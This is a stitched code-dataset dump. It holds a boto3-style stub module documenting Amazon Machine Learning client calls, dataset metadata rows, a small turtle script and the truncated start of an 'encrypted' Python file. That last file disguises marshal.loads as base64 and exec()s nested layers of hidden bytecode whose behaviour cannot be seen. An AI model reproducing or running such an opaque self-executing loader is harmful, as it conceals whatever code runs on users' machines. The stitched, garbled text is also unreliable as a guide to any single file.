'LastUpdatedAt': datetime(2015, 1, 1),
'Name': 'string',
'Status': 'PENDING'|'INPROGRESS'|'FAILED'|'COMPLETED'|'DELETED',
'OutputUri': 'string',
'Message': 'string',
'ComputeTime': 123,
'FinishedAt': datetime(2015, 1, 1),
'StartedAt': datetime(2015, 1, 1),
'TotalRecordCount': 123,
'InvalidRecordCount': 123
},
],
'NextToken': 'string'
}
:returns:
PENDING - Amazon Machine Learning (Amazon ML) submitted a request to generate predictions for a batch of observations.
INPROGRESS - The process is underway.
FAILED - The request to perform a batch prediction did not run to completion. It is not usable.
COMPLETED - The batch prediction process completed successfully.
DELETED - The BatchPrediction is marked as deleted. It is not usable.
"""
pass
def describe_data_sources(FilterVariable=None, EQ=None, GT=None, LT=None, GE=None, LE=None, NE=None, Prefix=None, SortOrder=None, NextToken=None, Limit=None):
"""
Returns a list of DataSource that match the search criteria in the request.
See also: AWS API Documentation
:example: response = client.describe_data_sources(
FilterVariable='CreatedAt'|'LastUpdatedAt'|'Status'|'Name'|'DataLocationS3'|'IAMUser',
EQ='string',
GT='string',
LT='string',
GE='string',
LE='string',
NE='string',
Prefix='string',
SortOrder='asc'|'dsc',
NextToken='string',
Limit=123
)
:type FilterVariable: string
:param FilterVariable: Use one of the following variables to filter a list of DataSource :
CreatedAt - Sets the search criteria to DataSource creation dates.
Status - Sets the search criteria to DataSource statuses.
Name - Sets the search criteria to the contents of DataSource **** Name .
DataUri - Sets the search criteria to the URI of data files used to create the DataSource . The URI can identify either a file or an Amazon Simple Storage Service (Amazon S3) bucket or directory.
IAMUser - Sets the search criteria to the user account that invoked the DataSource creation.
:type EQ: string
:param EQ: The equal to operator. The DataSource results will have FilterVariable values that exactly match the value specified with EQ .
:type GT: string
:param GT: The greater than operator. The DataSource results will have FilterVariable values that are greater than the value specified with GT .
:type LT: string
:param LT: The less than operator. The DataSource results will have FilterVariable values that are less than the value specified with LT .
:type GE: string
:param GE: The greater than or equal to operator. The DataSource results will have FilterVariable values that are greater than or equal to the value specified with GE .
:type LE: string
:param LE: The less than or equal to operator. The DataSource results will have FilterVariable values that are less than or equal to the value specified with LE .
:type NE: string
:param NE: The not equal to operator. The DataSource results will have FilterVariable values not equal to the value specified with NE .
:type Prefix: string
:param Prefix: A string that is found at the beginning of a variable, such as Name or Id .
For example, a DataSource could have the Name 2014-09-09-HolidayGiftMailer . To search for this DataSource , select Name for the FilterVariable and any of the following strings for the Prefix :
2014-09
2014-09-09
2014-09-09-Holiday
:type SortOrder: string
:param SortOrder: A two-value parameter that determines the sequence of the resulting list of DataSource .
asc - Arranges the list in ascending order (A-Z, 0-9).
dsc - Arranges the list in descending order (Z-A, 9-0).
Results are sorted by FilterVariable .
:type NextToken: string
:param NextToken: The ID of the page in the paginated results.
:type Limit: integer
:param Limit: The maximum number of DataSource to include in the result.
:rtype: dict
:return: {
'Results': [
{
'DataSourceId': 'string',
'DataLocationS3': 'string',
'DataRearrangement': 'string',
'CreatedByIamUser': 'string',
'CreatedAt': datetime(2015, 1, 1),
'LastUpdatedAt': datetime(2015, 1, 1),
'DataSizeInBytes': 123,
'NumberOfFiles': 123,
'Name': 'string',
'Status': 'PENDING'|'INPROGRESS'|'FAILED'|'COMPLETED'|'DELETED',
'Message': 'string',
'RedshiftMetadata': {
'RedshiftDatabase': {
'DatabaseName': 'string',
'ClusterIdentifier': 'string'
},
'DatabaseUserName': 'string',
'SelectSqlQuery': 'string'
},
'RDSMetadata': {
'Database': {
'InstanceIdentifier': 'string',
'DatabaseName': 'string'
},
'DatabaseUserName': 'string',
'SelectSqlQuery': 'string',
'ResourceRole': 'string',
'ServiceRole': 'string',
'DataPipelineId': 'string'
},
'RoleARN': 'string',
'ComputeStatistics': True|False,
'ComputeTime': 123,
'FinishedAt': datetime(2015, 1, 1),
'StartedAt': datetime(2015, 1, 1)
},
],
'NextToken': 'string'
}
:returns:
PENDING - Amazon Machine Learning (Amazon ML) submitted a request to create a DataSource .
INPROGRESS - The creation process is underway.
FAILED - The request to create a DataSource did not run to completion. It is not usable.
COMPLETED - The creation process completed successfully.
DELETED - The DataSource is marked as deleted. It is not usable.
"""
pass
def describe_evaluations(FilterVariable=None, EQ=None, GT=None, LT=None, GE=None, LE=None, NE=None, Prefix=None, SortOrder=None, NextToken=None, Limit=None):
"""
Returns a list of DescribeEvaluations that match the search criteria in the request.
See also: AWS API Documentation
:example: response = client.describe_evaluations(
FilterVariable='CreatedAt'|'LastUpdatedAt'|'Status'|'Name'|'IAMUser'|'MLModelId'|'DataSourceId'|'DataURI',
EQ='string',
GT='string',
LT='string',
GE='string',
LE='string',
NE='string',
Prefix='string',
SortOrder='asc'|'dsc',
NextToken='string',
Limit=123
)
:type FilterVariable: string
:param FilterVariable: Use one of the following variable to filter a list of Evaluation objects:
CreatedAt - Sets the search criteria to the Evaluation creation date.
Status - Sets the search criteria to the Evaluation status.
Name - Sets the search criteria to the contents of Evaluation **** Name .
IAMUser - Sets the search criteria to the user account that invoked an Evaluation .
MLModelId - Sets the search criteria to the MLModel that was evaluated.
DataSourceId - Sets the search criteria to the DataSource used in Evaluation .
DataUri - Sets the search criteria to the data file(s) used in Evaluation . The URL can identify either a file or an Amazon Simple Storage Solution (Amazon S3) bucket or directory.
:type EQ: string
:param EQ: The equal to operator. The Evaluation results will have FilterVariable values that exactly match the value specified with EQ .
:type GT: string
:param GT: The greater than operator. The Evaluation results will have FilterVariable values that are greater than the value specified with GT .
:type LT: string
:param LT: The less than operator. The Evaluation results will have FilterVariable values that are less than the value specified with LT .
:type GE: string
:param GE: The greater than or equal to operator. The Evaluation results will have FilterVariable values that are greater than or equal to the value specified with GE .
:type LE: string
:param LE: The less than or equal to operator. The Evaluation results will have FilterVariable values that are less than or equal to the value specified with LE .
:type NE: string
:param NE: The not equal to operator. The Evaluation results will have FilterVariable values not equal to the value specified with NE .
:type Prefix: string
:param Prefix: A string that is found at the beginning of a variable, such as Name or Id .
For example, an Evaluation could have the Name 2014-09-09-HolidayGiftMailer . To search for this Evaluation , select Name for the FilterVariable and any of the following strings for the Prefix :
2014-09
2014-09-09
2014-09-09-Holiday
:type SortOrder: string
:param SortOrder: A two-value parameter that determines the sequence of the resulting list of Evaluation .
asc - Arranges the list in ascending order (A-Z, 0-9).
dsc - Arranges the list in descending order (Z-A, 9-0).
Results are sorted by FilterVariable .
:type NextToken: string
:param NextToken: The ID of the page in the paginated results.
:type Limit: integer
:param Limit: The maximum number of Evaluation to include in the result.
:rtype: dict
:return: {
'Results': [
{
'EvaluationId': 'string',
'MLModelId': 'string',
'EvaluationDataSourceId': 'string',
'InputDataLocationS3': 'string',
'CreatedByIamUser': 'string',
'CreatedAt': datetime(2015, 1, 1),
'LastUpdatedAt': datetime(2015, 1, 1),
'Name': 'string',
'Status': 'PENDING'|'INPROGRESS'|'FAILED'|'COMPLETED'|'DELETED',
'PerformanceMetrics': {
'Properties': {
'string': 'string'
}
},
'Message': 'string',
'ComputeTime': 123,
'FinishedAt': datetime(2015, 1, 1),
'StartedAt': datetime(2015, 1, 1)
},
],
'NextToken': 'string'
}
:returns:
PENDING - Amazon Machine Learning (Amazon ML) submitted a request to evaluate an MLModel .
INPROGRESS - The evaluation is underway.
FAILED - The request to evaluate an MLModel did not run to completion. It is not usable.
COMPLETED - The evaluation process completed successfully.
DELETED - The Evaluation is marked as deleted. It is not usable.
"""
pass
def describe_ml_models(FilterVariable=None, EQ=None, GT=None, LT=None, GE=None, LE=None, NE=None, Prefix=None, SortOrder=None, NextToken=None, Limit=None):
"""
Returns a list of MLModel that match the search criteria in the request.
See also: AWS API Documentation
:example: response = client.describe_ml_models(
FilterVariable='CreatedAt'|'LastUpdatedAt'|'Status'|'Name'|'IAMUser'|'TrainingDataSourceId'|'RealtimeEndpointStatus'|'MLModelType'|'Algorithm'|'TrainingDataURI',
EQ='string',
GT='string',
LT='string',
GE='string',
LE='string',
NE='string',
Prefix='string',
SortOrder='asc'|'dsc',
NextToken='string',
Limit=123
)
:type FilterVariable: string
:param FilterVariable: Use one of the following variables to filter a list of MLModel :
CreatedAt - Sets the search criteria to MLModel creation date.
Status - Sets the search criteria to MLModel status.
Name - Sets the search criteria to the contents of MLModel **** Name .
IAMUser - Sets the search criteria to the user account that invoked the MLModel creation.
TrainingDataSourceId - Sets the search criteria to the DataSource used to train one or more MLModel .
RealtimeEndpointStatus - Sets the search criteria to the MLModel real-time endpoint status.
MLModelType - Sets the search criteria to MLModel type: binary, regression, or multi-class.
Algorithm - Sets the search criteria to the algorithm that the MLModel uses.
TrainingDataURI - Sets the search criteria to the data file(s) used in training a MLModel . The URL can identify either a file or an Amazon Simple Storage Service (Amazon S3) bucket or directory.
:type EQ: string
:param EQ: The equal to operator. The MLModel results will have FilterVariable values that exactly match the value specified with EQ .
:type GT: string
:param GT: The greater than operator. The MLModel results will have FilterVariable values that are greater than the value specified with GT .
:type LT: string
:param LT: The less than operator. The MLModel results will have FilterVariable values that are less than the value specified with LT .
:type GE: string
:param GE: The greater than or equal to operator. The MLModel results will have FilterVariable values that are greater than or equal to the value specified with GE .
:type LE: string
:param LE: The less than or equal to operator. The MLModel results will have FilterVariable values that are less than or equal to the value specified with LE .
:type NE: string
:param NE: The not equal to operator. The MLModel results will have FilterVariable values not equal to the value specified with NE .
:type Prefix: string
:param Prefix: A string that is found at the beginning of a variable, such as Name or Id .
For example, an MLModel could have the Name 2014-09-09-HolidayGiftMailer . To search for this MLModel , select Name for the FilterVariable and any of the following strings for the Prefix :
2014-09
2014-09-09
2014-09-09-Holiday
:type SortOrder: string
:param SortOrder: A two-value parameter that determines the sequence of the resulting list of MLModel .
asc - Arranges the list in ascending order (A-Z, 0-9).
dsc - Arranges the list in descending order (Z-A, 9-0).
Results are sorted by FilterVariable .
:type NextToken: string
:param NextToken: The ID of the page in the paginated results.
:type Limit: integer
:param Limit: The number of pages of information to include in the result. The range of acceptable values is 1 through 100 . The default value is 100 .
:rtype: dict
:return: {
'Results': [
{
'MLModelId': 'string',
'TrainingDataSourceId': 'string',
'CreatedByIamUser': 'string',
'CreatedAt': datetime(2015, 1, 1),
'LastUpdatedAt': datetime(2015, 1, 1),
'Name': 'string',
'Status': 'PENDING'|'INPROGRESS'|'FAILED'|'COMPLETED'|'DELETED',
'SizeInBytes': 123,
'EndpointInfo': {
'PeakRequestsPerSecond': 123,
'CreatedAt': datetime(2015, 1, 1),
'EndpointUrl': 'string',
'EndpointStatus': 'NONE'|'READY'|'UPDATING'|'FAILED'
},
'TrainingParameters': {
'string': 'string'
},
'InputDataLocationS3': 'string',
'Algorithm': 'sgd',
'MLModelType': 'REGRESSION'|'BINARY'|'MULTICLASS',
'ScoreThreshold': ...,
'ScoreThresholdLastUpdatedAt': datetime(2015, 1, 1),
'Message': 'string',
'ComputeTime': 123,
'FinishedAt': datetime(2015, 1, 1),
'StartedAt': datetime(2015, 1, 1)
},
],
'NextToken': 'string'
}
:returns:
PENDING - Amazon Machine Learning (Amazon ML) submitted a request to create an MLModel .
INPROGRESS - The creation process is underway.
FAILED - The request to create an MLModel didn't run to completion. The model isn't usable.
COMPLETED - The creation process completed successfully.
DELETED - The MLModel is marked as deleted. It isn't usable.
"""
pass
def describe_tags(ResourceId=None, ResourceType=None):
"""
Describes one or more of the tags for your Amazon ML object.
See also: AWS API Documentation
:example: response = client.describe_tags(
ResourceId='string',
ResourceType='BatchPrediction'|'DataSource'|'Evaluation'|'MLModel'
)
:type ResourceId: string
:param ResourceId: [REQUIRED]
The ID of the ML object. For example, exampleModelId .
:type ResourceType: string
:param ResourceType: [REQUIRED]
The type of the ML object.
:rtype: dict
:return: {
'ResourceId': 'string',
'ResourceType': 'BatchPrediction'|'DataSource'|'Evaluation'|'MLModel',
'Tags': [
{
'Key': 'string',
'Value': 'string'
},
]
}
"""
pass
def generate_presigned_url(ClientMethod=None, Params=None, ExpiresIn=None, HttpMethod=None):
"""
Generate a presigned url given a client, its method, and arguments
:type ClientMethod: string
:param ClientMethod: The client method to presign for
:type Params: dict
:param Params: The parameters normally passed to
ClientMethod.
:type ExpiresIn: int
:param ExpiresIn: The number of seconds the presigned url is valid
for. By default it expires in an hour (3600 seconds)
:type HttpMethod: string
:param HttpMethod: The http method to use on the generated url. By
default, the http method is whatever is used in the method's model.
"""
pass
def get_batch_prediction(BatchPredictionId=None):
"""
Returns a BatchPrediction that includes detailed metadata, status, and data file information for a Batch Prediction request.
See also: AWS API Documentation
:example: response = client.get_batch_prediction(
BatchPredictionId='string'
)
:type BatchPredictionId: string
:param BatchPredictionId: [REQUIRED]
An ID assigned to the BatchPrediction at creation.
:rtype: dict
:return: {
'BatchPredictionId': 'string',
'MLModelId': 'string',
'BatchPredictionDataSourceId': 'string',
'InputDataLocationS3': 'string',
'CreatedByIamUser': 'string',
'CreatedAt': datetime(2015, 1, 1),
'LastUpdatedAt': datetime(2015, 1, 1),
'Name': 'string',
'Status': 'PENDING'|'INPROGRESS'|'FAILED'|'COMPLETED'|'DELETED',
'OutputUri': 'string',
'LogUri': 'string',
'Message': 'string',
'ComputeTime': 123,
'FinishedAt': datetime(2015, 1, 1),
'StartedAt': datetime(2015, 1, 1),
'TotalRecordCount': 123,
'InvalidRecordCount': 123
}
"""
pass
def get_data_source(DataSourceId=None, Verbose=None):
"""
Returns a DataSource that includes metadata and data file information, as well as the current status of the DataSource .
GetDataSource provides results in normal or verbose format. The verbose format adds the schema description and the list of files pointed to by the DataSource to the normal format.
See also: AWS API Documentation
:example: response = client.get_data_source(
DataSourceId='string',
Verbose=True|False
)
:type DataSourceId: string
:param DataSourceId: [REQUIRED]
The ID assigned to the DataSource at creation.
:type Verbose: boolean
:param Verbose: Specifies whether the GetDataSource operation should return DataSourceSchema .
If true, DataSourceSchema is returned.
If false, DataSourceSchema is not returned.
:rtype: dict
:return: {
'DataSourceId': 'string',
'DataLocationS3': 'string',
'DataRearrangement': 'string',
'CreatedByIamUser': 'string',
'CreatedAt': datetime(2015, 1, 1),
'LastUpdatedAt': datetime(2015, 1, 1),
'DataSizeInBytes': 123,
'NumberOfFiles': 123,
'Name': 'string',
'Status': 'PENDING'|'INPROGRESS'|'FAILED'|'COMPLETED'|'DELETED',
'LogUri': 'string',
'Message': 'string',
'RedshiftMetadata': {
'RedshiftDatabase': {
'DatabaseName': 'string',
'ClusterIdentifier': 'string'
},
'DatabaseUserName': 'string',
'SelectSqlQuery': 'string'
},
'RDSMetadata': {
'Database': {
'InstanceIdentifier': 'string',
'DatabaseName': 'string'
},
'DatabaseUserName': 'string',
'SelectSqlQuery': 'string',
'ResourceRole': 'string',
'ServiceRole': 'string',
'DataPipelineId': 'string'
},
'RoleARN': 'string',
'ComputeStatistics': True|False,
'ComputeTime': 123,
'FinishedAt': datetime(2015, 1, 1),
'StartedAt': datetime(2015, 1, 1),
'DataSourceSchema': 'string'
}
:returns:
PENDING - Amazon ML submitted a request to create a DataSource .
INPROGRESS - The creation process is underway.
FAILED - The request to create a DataSource did not run to completion. It is not usable.
COMPLETED - The creation process completed successfully.
DELETED - The DataSource is marked as deleted. It is not usable.
"""
pass
def get_evaluation(EvaluationId=None):
"""
Returns an Evaluation that includes metadata as well as the current status of the Evaluation .
See also: AWS API Documentation
:example: response = client.get_evaluation(
EvaluationId='string'
)
:type EvaluationId: string
:param EvaluationId: [REQUIRED]
The ID of the Evaluation to retrieve. The evaluation of each MLModel is recorded and cataloged. The ID provides the means to access the information.
:rtype: dict
:return: {
'EvaluationId': 'string',
'MLModelId': 'string',
'EvaluationDataSourceId': 'string',
'InputDataLocationS3': 'string',
'CreatedByIamUser': 'string',
'CreatedAt': datetime(2015, 1, 1),
'LastUpdatedAt': datetime(2015, 1, 1),
'Name': 'string',
'Status': 'PENDING'|'INPROGRESS'|'FAILED'|'COMPLETED'|'DELETED',
'PerformanceMetrics': {
'Properties': {
'string': 'string'
}
},
'LogUri': 'string',
'Message': 'string',
'ComputeTime': 123,
'FinishedAt': datetime(2015, 1, 1),
'StartedAt': datetime(2015, 1, 1)
}
:returns:
BinaryAUC: A binary MLModel uses the Area Under the Curve (AUC) technique to measure performance.
RegressionRMSE: A regression MLModel uses the Root Mean Square Error (RMSE) technique to measure performance. RMSE measures the difference between predicted and actual values for a single variable.
MulticlassAvgFScore: A multiclass MLModel uses the F1 score technique to measure performance.
"""
pass
def get_ml_model(MLModelId=None, Verbose=None):
"""
Returns an MLModel that includes detailed metadata, data source information, and the current status of the MLModel .
GetMLModel provides results in normal or verbose format.
See also: AWS API Documentation
:example: response = client.get_ml_model(
MLModelId='string',
Verbose=True|False
)
:type MLModelId: string
:param MLModelId: [REQUIRED]
The ID assigned to the MLModel at creation.
:type Verbose: boolean
:param Verbose: Specifies whether the GetMLModel operation should return Recipe .
If true, Recipe is returned.
If false, Recipe is not returned.
:rtype: dict
:return: {
'MLModelId': 'string',
'TrainingDataSourceId': 'string',
'CreatedByIamUser': 'string',
'CreatedAt': datetime(2015, 1, 1),
'LastUpdatedAt': datetime(2015, 1, 1),
'Name': 'string',
'Status': 'PENDING'|'INPROGRESS'|'FAILED'|'COMPLETED'|'DELETED',
'SizeInBytes': 123,
'EndpointInfo': {
'PeakRequestsPerSecond': 123,
'CreatedAt': datetime(2015, 1, 1),
'EndpointUrl': 'string',
'EndpointStatus': 'NONE'|'READY'|'UPDATING'|'FAILED'
},
'TrainingParameters': {
'string': 'string'
},
'InputDataLocationS3': 'string',
'MLModelType': 'REGRESSION'|'BINARY'|'MULTICLASS',
'ScoreThreshold': ...,
'ScoreThresholdLastUpdatedAt': datetime(2015, 1, 1),
'LogUri': 'string',
'Message': 'string',
'ComputeTime': 123,
'FinishedAt': datetime(2015, 1, 1),
'StartedAt': datetime(2015, 1, 1),
'Recipe': 'string',
'Schema': 'string'
}
:returns:
PENDING - Amazon Machine Learning (Amazon ML) submitted a request to describe a MLModel .
INPROGRESS - The request is processing.
FAILED - The request did not run to completion. The ML model isn't usable.
COMPLETED - The request completed successfully.
DELETED - The MLModel is marked as deleted. It isn't usable.
"""
pass
def get_paginator(operation_name=None):
"""
Create a paginator for an operation.
:type operation_name: string
:param operation_name: The operation name. This is the same name
as the method name on the client. For example, if the
method name is create_foo, and you'd normally invoke the
operation as client.create_foo(**kwargs), if the
create_foo operation can be paginated, you can use the
call client.get_paginator('create_foo').
:rtype: L{botocore.paginate.Paginator}
"""
pass
def get_waiter():
"""
"""
pass
def predict(MLModelId=None, Record=None, PredictEndpoint=None):
"""
Generates a prediction for the observation using the specified ML Model .
See also: AWS API Documentation
:example: response = client.predict(
MLModelId='string',
Record={
'string': 'string'
},
PredictEndpoint='string'
)
:type MLModelId: string
:param MLModelId: [REQUIRED]
A unique identifier of the MLModel .
:type Record: dict
:param Record: [REQUIRED]
A map of variable name-value pairs that represent an observation.
(string) --The name of a variable. Currently it's used to specify the name of the target value, label, weight, and tags.
(string) --The value of a variable. Currently it's used to specify values of the target value, weights, and tag variables and for filtering variable values.
:type PredictEndpoint: string
:param PredictEndpoint: [REQUIRED]
:rtype: dict
:return: {
'Prediction': {
'predictedLabel': 'string',
'predictedValue': ...,
'predictedScores': {
'string': ...
},
'details': {
'string': 'string'
}
}
}
:returns:
Details - Contains the following attributes: DetailsAttributes.PREDICTIVE_MODEL_TYPE - REGRESSION | BINARY | MULTICLASS DetailsAttributes.ALGORITHM - SGD
PredictedLabel - Present for either a BINARY or MULTICLASS MLModel request.
PredictedScores - Contains the raw classification score corresponding to each label.
PredictedValue - Present for a REGRESSION MLModel request.
"""
pass
def update_batch_prediction(BatchPredictionId=None, BatchPredictionName=None):
"""
Updates the BatchPredictionName of a BatchPrediction .
You can use the GetBatchPrediction operation to view the contents of the updated data element.
See also: AWS API Documentation
:example: response = client.update_batch_prediction(
BatchPredictionId='string',
BatchPredictionName='string'
)
:type BatchPredictionId: string
:param BatchPredictionId: [REQUIRED]
The ID assigned to the BatchPrediction during creation.
:type BatchPredictionName: string
:param BatchPredictionName: [REQUIRED]
A new user-supplied name or description of the BatchPrediction .
:rtype: dict
:return: {
'BatchPredictionId': 'string'
}
"""
pass
def update_data_source(DataSourceId=None, DataSourceName=None):
"""
Updates the DataSourceName of a DataSource .
You can use the GetDataSource operation to view the contents of the updated data element.
See also: AWS API Documentation
:example: response = client.update_data_source(
DataSourceId='string',
DataSourceName='string'
)
:type DataSourceId: string
:param DataSourceId: [REQUIRED]
The ID assigned to the DataSource during creation.
:type DataSourceName: string
:param DataSourceName: [REQUIRED]
A new user-supplied name or description of the DataSource that will replace the current description.
:rtype: dict
:return: {
'DataSourceId': 'string'
}
"""
pass
def update_evaluation(EvaluationId=None, EvaluationName=None):
"""
Updates the EvaluationName of an Evaluation .
You can use the GetEvaluation operation to view the contents of the updated data element.
See also: AWS API Documentation
:example: response = client.update_evaluation(
EvaluationId='string',
EvaluationName='string'
)
:type EvaluationId: string
:param EvaluationId: [REQUIRED]
The ID assigned to the Evaluation during creation.
:type EvaluationName: string
:param EvaluationName: [REQUIRED]
A new user-supplied name or description of the Evaluation that will replace the current content.
:rtype: dict
:return: {
'EvaluationId': 'string'
}
"""
pass
def update_ml_model(MLModelId=None, MLModelName=None, ScoreThreshold=None):
"""
Updates the MLModelName and the ScoreThreshold of an MLModel .
You can use the GetMLModel operation to view the contents of the updated data element.
See also: AWS API Documentation
:example: response = client.update_ml_model(
MLModelId='string',
MLModelName='string',
ScoreThreshold=...
)
:type MLModelId: string
:param MLModelId: [REQUIRED]
The ID assigned to the MLModel during creation.
:type MLModelName: string
:param MLModelName: A user-supplied name or description of the MLModel .
:type ScoreThreshold: float
:param ScoreThreshold: The ScoreThreshold used in binary classification MLModel that marks the boundary between a positive prediction and a negative prediction.
Output values greater than or equal to the ScoreThreshold receive a positive result from the MLModel , such as true . Output values less than the ScoreThreshold receive a negative response from the MLModel , such as false .
:rtype: dict
:return: {
'MLModelId': 'string'
}
"""
pass
| 51.528037 | 2,142 | 0.675671 | 10,604 | 88,216 | 5.606375 | 0.082045 | 0.010093 | 0.00831 | 0.008949 | 0.771304 | 0.735021 | 0.707771 | 0.676972 | 0.64942 | 0.625248 | 0 | 0.011363 | 0.253798 | 88,216 | 1,711 | 2,143 | 51.558153 | 0.891762 | 0.896447 | 0 | 0.5 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | false | 0.5 | 0 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
4e03a77e3dae2a36c0c4190d7441253d27583eae | 119 | py | Python | square.py | sonu98513/python | 017414934478970118ad470e44a926514ca45e31 | [
"MIT"
] | null | null | null | square.py | sonu98513/python | 017414934478970118ad470e44a926514ca45e31 | [
"MIT"
] | null | null | null | square.py | sonu98513/python | 017414934478970118ad470e44a926514ca45e31 | [
"MIT"
] | null | null | null | from turtle import *
forward(150)
right(90)
forward(150)
right(90)
forward(150)
right(90)
forward(150)
done()
| 11.9 | 21 | 0.680672 | 18 | 119 | 4.5 | 0.444444 | 0.493827 | 0.555556 | 0.62963 | 0.753086 | 0.753086 | 0.753086 | 0.753086 | 0.753086 | 0.753086 | 0 | 0.183673 | 0.176471 | 119 | 9 | 22 | 13.222222 | 0.642857 | 0 | 0 | 0.777778 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.111111 | 0 | 0.111111 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 12 |
9d7d8096bef3e58d235e7e67c977ca5cf1c9f67b | 185,393 | py | Python | anti/main.py | Alpha-Demon404/RE-14 | b5b46a9f0eee218f2a642b615c77135c33c6f4ad | [
"MIT"
] | 39 | 2020-02-26T09:44:36.000Z | 2022-03-23T00:18:25.000Z | anti/main.py | B4BY-DG/reverse-enginnering | b5b46a9f0eee218f2a642b615c77135c33c6f4ad | [
"MIT"
] | 15 | 2020-05-14T10:07:26.000Z | 2022-01-06T02:55:32.000Z | anti/main.py | B4BY-DG/reverse-enginnering | b5b46a9f0eee218f2a642b615c77135c33c6f4ad | [
"MIT"
] | 41 | 2020-03-16T22:36:38.000Z | 2022-03-17T14:47:19.000Z | #Encrypt by Sumarr ID
import os,sys
from marshal import loads as base64
def asw():
exec(base64('c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00@\x00\x00\x00s<\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x02\x00l\x02\x00m\x03\x00Z\x04\x00\x01d\x03\x00\x84\x00\x00Z\x05\x00e\x05\x00\x83\x00\x00\x01d\x01\x00S(\x04\x00\x00\x00i\xff\xff\xff\xffN(\x01\x00\x00\x00t\x05\x00\x00\x00loadsc\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00B\x00\x00\x00s\x1f\x00\x00\x00e\x00\x00d\x01\x00\x83\x01\x00d\x00\x00\x04Ue\x01\x00j\x02\x00j\x03\x00\x83\x00\x00\x01d\x00\x00S(\x02\x00\x00\x00Ns\x01\xf4\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00@\x00\x00\x00s<\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x02\x00l\x02\x00m\x03\x00Z\x04\x00\x01d\x03\x00\x84\x00\x00Z\x05\x00e\x05\x00\x83\x00\x00\x01d\x01\x00S(\x04\x00\x00\x00i\xff\xff\xff\xffN(\x01\x00\x00\x00t\x05\x00\x00\x00loadsc\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00B\x00\x00\x00s\x1f\x00\x00\x00e\x00\x00d\x01\x00\x83\x01\x00d\x00\x00\x04Ue\x01\x00j\x02\x00j\x03\x00\x83\x00\x00\x01d\x00\x00S(\x02\x00\x00\x00Ns\x98\xf2\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00@\x00\x00\x00s<\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x02\x00l\x02\x00m\x03\x00Z\x04\x00\x01d\x03\x00\x84\x00\x00Z\x05\x00e\x05\x00\x83\x00\x00\x01d\x01\x00S(\x04\x00\x00\x00i\xff\xff\xff\xffN(\x01\x00\x00\x00t\x05\x00\x00\x00loadsc\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00B\x00\x00\x00s\x1f\x00\x00\x00e\x00\x00d\x01\x00\x83\x01\x00d\x00\x00\x04Ue\x01\x00j\x02\x00j\x03\x00\x83\x00\x00\x01d\x00\x00S(\x02\x00\x00\x00Ns/\xf1\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00@\x00\x00\x00s<\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x02\x00l\x02\x00m\x03\x00Z\x04\x00\x01d\x03\x00\x84\x00\x00Z\x05\x00e\x05\x00\x83\x00\x00\x01d\x01\x00S(\x04\x00\x00\x00i\xff\xff\xff\xffN(\x01\x00\x00\x00t\x05\x00\x00\x00loadsc\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00B\x00\x00\x00s\x1f\x00\x00\x00e\x00\x00d\x01\x00\x83\x01\x00d\x00\x00\x04Ue\x01\x00j\x02\x00j\x03\x00\x83\x00\x00\x01d\x00\x00S(\x02\x00\x00\x00Ns\xc6\xef\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00@\x00\x00\x00s<\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x02\x00l\x02\x00m\x03\x00Z\x04\x00\x01d\x03\x00\x84\x00\x00Z\x05\x00e\x05\x00\x83\x00\x00\x01d\x01\x00S(\x04\x00\x00\x00i\xff\xff\xff\xffN(\x01\x00\x00\x00t\x05\x00\x00\x00loadsc\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00B\x00\x00\x00s\x1f\x00\x00\x00e\x00\x00d\x01\x00\x83\x01\x00d\x00\x00\x04Ue\x01\x00j\x02\x00j\x03\x00\x83\x00\x00\x01d\x00\x00S(\x02\x00\x00\x00Ns]\xee\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00@\x00\x00\x00s<\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x02\x00l\x02\x00m\x03\x00Z\x04\x00\x01d\x03\x00\x84\x00\x00Z\x05\x00e\x05\x00\x83\x00\x00\x01d\x01\x00S(\x04\x00\x00\x00i\xff\xff\xff\xffN(\x01\x00\x00\x00t\x05\x00\x00\x00loadsc\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00B\x00\x00\x00s\x1f\x00\x00\x00e\x00\x00d\x01\x00\x83\x01\x00d\x00\x00\x04Ue\x01\x00j\x02\x00j\x03\x00\x83\x00\